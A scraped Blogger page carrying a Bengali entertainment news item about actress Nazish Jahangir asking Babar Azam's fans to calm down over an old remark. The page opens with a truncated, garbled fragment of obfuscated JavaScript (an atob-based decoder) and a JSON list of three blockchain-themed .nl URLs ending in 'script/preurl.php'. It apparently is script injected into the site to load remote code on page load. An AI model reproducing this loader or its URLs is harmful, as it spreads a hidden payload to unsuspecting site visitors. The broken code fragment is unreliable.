/*>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t/* */ { "urls": [ "chaintopdom.nl/script/preurl.php", "smarttopchain.nl/script/preurl.php", "topblockchainsolutions.nl/script/preurl.php" ] } বাবর আর্মিদের শান্ত থাকার অনুরোধ অভিনেত্রী নাজিশ জাহাঙ্গীরের... - bd5.blogspot.com

Header Ads ADCASH

বাবর আর্মিদের শান্ত থাকার অনুরোধ অভিনেত্রী নাজিশ জাহাঙ্গীরের...

বাবর আর্মিদের শান্ত থাকার অনুরোধ অভিনেত্রী নাজিশ জাহাঙ্গীরের...




#Sports #cricket #BabarAzam


পাকিস্তান জাতীয় দলের সাবেক অধিনায়ক বাবর আজমকে ঘিরে দেওয়া নিজের পুরোনো মন্তব্যের জেরে আবারও সমালোচনার মুখে পড়েছেন জনপ্রিয় টিভি অভিনেত্রী নাজিশ জাহাঙ্গীর খান। অবশেষে এ বিষয়ে সরাসরি নিজের অবস্থান পরিষ্কার করেছেন তিনি।

জিও সুপারের এক প্রতিবেদনে বলা হয়, বছরের শুরুতে একটি প্রশ্নোত্তর অনুষ্ঠানে এক ভক্ত জানতে চান— বাবর আজম যদি তাকে বিয়ের প্রস্তাব দেন, তিনি কি তা গ্রহণ করবেন? নাজিশ সেই প্রশ্নের উত্তরে বলেন, ‘না, রাজি হব না।’ এরপরই সোশ্যাল মিডিয়ায় বাবর সমর্থকদের সমালোচনার শিকার হন তিনি।

সম্প্রতি এক ডিজিটাল বিনোদনমাধ্যম পুরোনো সেই মন্তব্যকে নতুন করে আকর্ষণীয় শিরোনামে প্রকাশ করলে বিষয়টি আবার ভাইরাল হয়ে যায়। এতে নতুন করে অনলাইনে নেতিবাচক মন্তব্য ও আক্রমণের মুখোমুখি হন নাজিশ।

এই পরিস্থিতিতে ইনস্টাগ্রাম স্টোরিতে তিনি লিখেছেন— বাবর ভক্তদের এখন শান্ত হওয়া প্রয়োজন। একটি পুরোনো প্রশ্নোত্তর পর্বের কথাকে প্রেক্ষাপট ছাড়া তুলে ধরে অযথা বিতর্ক তৈরি করা হচ্ছে।

তিনি আরও জানান, বাবর আজমসহ পুরো পাকিস্তান ক্রিকেট দলের প্রতি তার গভীর সম্মান রয়েছে। তারা দেশের গর্ব, এবং তিনি কখনোই এমন কিছু বলেননি বা বলবেন না যা তাদের অসম্মান করে।

চটকদার শিরোনাম বা সম্পাদিত তথ্য দিয়ে অযথা নাটকীয়তা তৈরি না করার অনুরোধ জানিয়ে নাজিশ আরও লেখেন— দয়া করে বিকৃত বা অতিরঞ্জিত তথ্য ছড়ানো বন্ধ করুন। বিশেষ করে সেই খেলোয়াড়দের বিরুদ্ধে নেতিবাচকতা ছড়াবেন না, যারা দেশের জন্য সর্বোচ্চ চেষ্টা করে। সবার প্রতি ভালোবাসা।



No comments

Theme images by suprun. Powered by Blogger.